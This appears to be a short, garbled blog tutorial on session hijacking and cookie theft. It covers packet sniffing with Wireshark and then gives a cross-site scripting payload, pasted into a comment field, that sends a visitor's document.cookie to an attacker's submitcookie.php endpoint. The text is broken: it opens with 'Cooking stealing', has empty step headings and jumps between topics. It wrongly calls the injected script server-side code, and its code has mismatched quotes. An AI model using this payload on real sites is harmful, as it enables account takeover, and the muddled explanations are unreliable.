Cooking stealing, sometimes also known as session hijacking or cookie hijacking – because to steal a cookie a session must be hijacked. Cookie stealing or session hijacking is the exploitation of session on web browser to gain unauthorized access to information or services opened or saved in web browser. Cookie stealing is common among malicious hackers overtime because of that cookie stealing or session hijacking is hacking requires no special skills, if care is not taken, information of victim can be stolen effortlessly.
To perform session hijacking in order to steal cookie, there are some methods available and are being used by malicious hackers to perform session hacking or by web security tester to carry out penetration testing. In each method used in session and cookie hijacking, there are different tools used for each method.
The followings are 2 Best Methods To Perform Session Hijacking for Cookie Stealing:
1. Using of Packet Sniffers: Packet Sniffer or Packet Analyzer is also know as Protocol Analyzer or Network Analyzer is a software tool usually an open-source install-able on computer connected in network for network monitoring and analysis purposes by intercepting network traffic to capture and log packet first before analyzing them. To perform session hijacking to steal cookies , attacker must capture packet or log network traffic for analysis. To do this effectively, it is advised to use the best and popularly used network packet analyzer and monitoring tool like Wireshark.
A network packet is a unit of data transmits in packet-switched network. A packet consists of control information (header) and user data which is also known as the payload. Data packet contains the source IP address, destination IP address and other information like service and protocol.
How Network Packet Analyzer Capture Packet To Perform Session Hijacking and Cookie Stealing:
Step 1 Step 2
Attacker pastes the following code in the comment section a website, it would not reject because the would website thinks that its a server side code and it runs the code.
'<img src="http://localhost/submitcookie.php? cookie ='
+ escape(document.cookie) + '" />);